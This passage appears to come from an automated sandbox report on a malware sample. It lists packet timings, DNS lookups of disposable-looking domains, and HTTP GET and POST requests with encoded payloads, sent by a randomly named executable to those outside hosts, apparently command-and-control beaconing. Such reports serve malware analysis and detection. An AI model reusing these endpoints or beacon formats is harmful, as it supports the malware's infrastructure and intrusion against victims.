                                                                                                                                                                            Sep 27, 2024 17:31:50.930042982 CEST6372280192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.933132887 CEST6372280192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.939987898 CEST806372285.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:56.448406935 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:56.453284025 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:56.453377962 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:56.465771914 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:56.470613956 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:57.286891937 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:57.286937952 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:57.288710117 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:57.968234062 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:58.994440079 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:58.999603033 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:58.999681950 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:59.012377024 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:59.017333031 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:59.822199106 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:59.822334051 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:59.824589968 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:00.515078068 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.533714056 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.538645029 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:01.541780949 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.550728083 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.555717945 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:01.555747032 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:02.544923067 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:02.545123100 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:02.545176029 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:03.061963081 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.081712008 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.086812973 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.089055061 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.095128059 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.100042105 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.944849014 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.944989920 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.945053101 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.947622061 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.952488899 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.410633087 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:10.427402973 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.427599907 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:10.442198038 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:10.452291965 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.965820074 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.965892076 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:11.952657938 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:11.958447933 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:12.971610069 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:13.011288881 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:13.011415958 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:13.025866985 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:13.031024933 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:13.559016943 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:13.559112072 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:14.530811071 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:14.541083097 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:15.551976919 CEST6373080192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:15.557243109 CEST8063730208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:15.560059071 CEST6373080192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:15.571778059 CEST6373080192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:15.577754974 CEST8063730208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:15.577896118 CEST8063730208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:16.100186110 CEST8063730208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:16.103969097 CEST6373080192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:17.077665091 CEST6373080192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:17.082756042 CEST8063730208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:18.096530914 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:18.106043100 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:18.107899904 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:18.115799904 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:18.120847940 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.335733891 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.335813999 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.335850954 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.335927963 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.335973024 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.336007118 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.336041927 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.336076975 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.336122036 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.336780071 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.336813927 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.336849928 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.336977005 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.345432997 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.376950026 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.377003908 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.380263090 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.439587116 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.439636946 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.439675093 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.439860106 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.440022945 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.440205097 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.440238953 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.440310001 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.440356970 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.441318035 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.441371918 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.441405058 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.441437960 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.442612886 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.442775011 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.442809105 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.442960024 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.444510937 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.444544077 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.444577932 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.444746971 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.446295977 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.446331024 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.446425915 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.462968111 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.463135958 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.463170052 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.463430882 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.464215040 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.515877962 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.515994072 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.516031027 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.516064882 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.516289949 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.529526949 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.529680967 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.529714108 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.529859066 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:19.530505896 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.530540943 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:19.530620098 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:24.399009943 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:24.399168015 CEST8063731208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:24.399224997 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:24.402237892 CEST6373180192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:24.410769939 CEST8063731208.91.197.39192.168.2.5

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Sep 27, 2024 17:29:19.862102032 CEST53616881.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:29:45.464725018 CEST5825653192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:29:45.546993017 CEST53582561.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:01.331082106 CEST5859953192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:30:01.351675987 CEST53585991.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:09.409774065 CEST5347953192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:30:09.419672012 CEST53534791.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:17.487277985 CEST6050153192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:30:17.507488012 CEST53605011.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:31.065668106 CEST5574653192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:30:31.577517033 CEST53557461.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:45.128381014 CEST6537353192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:30:45.409668922 CEST53653731.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:59.081866980 CEST4942753192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:30:59.374295950 CEST53494271.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:15.427758932 CEST5236253192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:31:15.964056015 CEST53523621.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:29.363729954 CEST5122953192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:31:29.377751112 CEST53512291.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:42.488126040 CEST5318953192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:31:42.578954935 CEST53531891.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:55.940165043 CEST6044653192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:31:56.445586920 CEST53604461.1.1.1192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:09.956635952 CEST5631053192.168.2.51.1.1.1
                                                                                                                                                                            Sep 27, 2024 17:32:10.407565117 CEST53563101.1.1.1192.168.2.5

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                            Sep 27, 2024 17:29:45.464725018 CEST192.168.2.51.1.1.10x2819Standard query (0)www.030003302.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:01.331082106 CEST192.168.2.51.1.1.10x6939Standard query (0)www.popin.spaceA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:09.409774065 CEST192.168.2.51.1.1.10x892dStandard query (0)www.48vlu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:17.487277985 CEST192.168.2.51.1.1.10xd21dStandard query (0)www.searchgpt.homesA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:31.065668106 CEST192.168.2.51.1.1.10x37baStandard query (0)www.2q63f.topA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:45.128381014 CEST192.168.2.51.1.1.10x695eStandard query (0)www.b5x7vk.agencyA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:59.081866980 CEST192.168.2.51.1.1.10xcd4dStandard query (0)www.martaschrimpf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:15.427758932 CEST192.168.2.51.1.1.10xc333Standard query (0)www.tomtox.topA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:29.363729954 CEST192.168.2.51.1.1.10xfbfbStandard query (0)www.tracy.clubA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:42.488126040 CEST192.168.2.51.1.1.10x4dd0Standard query (0)www.sppsuperplast.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:55.940165043 CEST192.168.2.51.1.1.10x6b3cStandard query (0)www.nojamaica.netA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:32:09.956635952 CEST192.168.2.51.1.1.10x45d0Standard query (0)www.alphaaistore.comA (IP address)IN (0x0001)false

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                            Sep 27, 2024 17:29:45.546993017 CEST1.1.1.1192.168.2.50x2819No error (0)www.030003302.xyz030003302.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:29:45.546993017 CEST1.1.1.1192.168.2.50x2819No error (0)030003302.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:01.351675987 CEST1.1.1.1192.168.2.50x6939Name error (3)www.popin.spacenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:09.419672012 CEST1.1.1.1192.168.2.50x892dName error (3)www.48vlu.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:17.507488012 CEST1.1.1.1192.168.2.50xd21dNo error (0)www.searchgpt.homessearchgpt.homesCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:17.507488012 CEST1.1.1.1192.168.2.50xd21dNo error (0)searchgpt.homes3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:17.507488012 CEST1.1.1.1192.168.2.50xd21dNo error (0)searchgpt.homes15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:31.577517033 CEST1.1.1.1192.168.2.50x37baNo error (0)www.2q63f.top2q63f.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:31.577517033 CEST1.1.1.1192.168.2.50x37baNo error (0)2q63f.top38.47.233.19A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:45.409668922 CEST1.1.1.1192.168.2.50x695eNo error (0)www.b5x7vk.agency172.67.165.25A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:45.409668922 CEST1.1.1.1192.168.2.50x695eNo error (0)www.b5x7vk.agency104.21.11.31A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:30:59.374295950 CEST1.1.1.1192.168.2.50xcd4dNo error (0)www.martaschrimpf.info208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:15.964056015 CEST1.1.1.1192.168.2.50xc333No error (0)www.tomtox.top162.0.238.43A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:29.377751112 CEST1.1.1.1192.168.2.50xfbfbNo error (0)www.tracy.clubtracy.clubCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:29.377751112 CEST1.1.1.1192.168.2.50xfbfbNo error (0)tracy.club3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:29.377751112 CEST1.1.1.1192.168.2.50xfbfbNo error (0)tracy.club15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:42.578954935 CEST1.1.1.1192.168.2.50x4dd0No error (0)www.sppsuperplast.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:42.578954935 CEST1.1.1.1192.168.2.50x4dd0No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:42.578954935 CEST1.1.1.1192.168.2.50x4dd0No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:31:56.445586920 CEST1.1.1.1192.168.2.50x6b3cNo error (0)www.nojamaica.net160.251.148.20A (IP address)IN (0x0001)false
                                                                                                                                                                            Sep 27, 2024 17:32:10.407565117 CEST1.1.1.1192.168.2.50x45d0No error (0)www.alphaaistore.com208.91.197.39A (IP address)IN (0x0001)false

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • www.030003302.xyz
                                                                                                                                                                            • www.searchgpt.homes
                                                                                                                                                                            • www.2q63f.top
                                                                                                                                                                            • www.b5x7vk.agency
                                                                                                                                                                            • www.martaschrimpf.info
                                                                                                                                                                            • www.tomtox.top
                                                                                                                                                                            • www.tracy.club
                                                                                                                                                                            • www.sppsuperplast.online
                                                                                                                                                                            • www.nojamaica.net
                                                                                                                                                                            • www.alphaaistore.com

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.56368865.21.196.90805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:29:45.589664936 CEST585OUTGET /1nuz/?Ah=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4Oq8ZNp7wpFj1U/P2B+qNM5mXkMr/9uw3rZ9uOJdcOYzpfEQ==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.030003302.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:29:46.279315948 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                                                            Connection: close
                                                                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            content-length: 796
                                                                                                                                                                            date: Fri, 27 Sep 2024 15:29:46 GMT
                                                                                                                                                                            vary: User-Agent
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.5636923.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:17.533838987 CEST847OUTPOST /974s/ HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.searchgpt.homes
                                                                                                                                                                            Referer: http://www.searchgpt.homes/974s/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 71 70 4b 54 52 46 74 4a 53 78 2b 30 63 69 6c 76 63 47 54 77 43 48 42 5a 79 66 4e 74 46 42 6b 6c 38 32 66 44 78 66 45 77 6e 6f 75 75 33 45 53 55 44 44 50 73 4f 6f 32 33 79 51 7a 31 32 57 39 72 41 2f 6d 45 75 76 49 62 65 6d 7a 34 52 64 4d 42 54 54 78 51 77 6d 37 4b 6e 30 46 69 5a 33 4e 47 58 4e 70 6c 35 6a 77 6a 34 62 62 7a 38 2f 44 45 78 71 5a 73 78 4d 35 4f 4b 4c 45 74 53 41 70 6e 69 33 33 45 6d 71 73 36 4d 38 66 65 66 31 55 4a 54 39 69 4a 56 65 6e 76 79 2b 54 45 6f 58 2b 6b 54 79 70 32 73 42 46 41 58 4a 32 4e 46 31 39 75 75 46 65 51 63 4c 2b 39 6d 50 78 32 2f 75 71 49 75 73 51 31 6c 77 3d
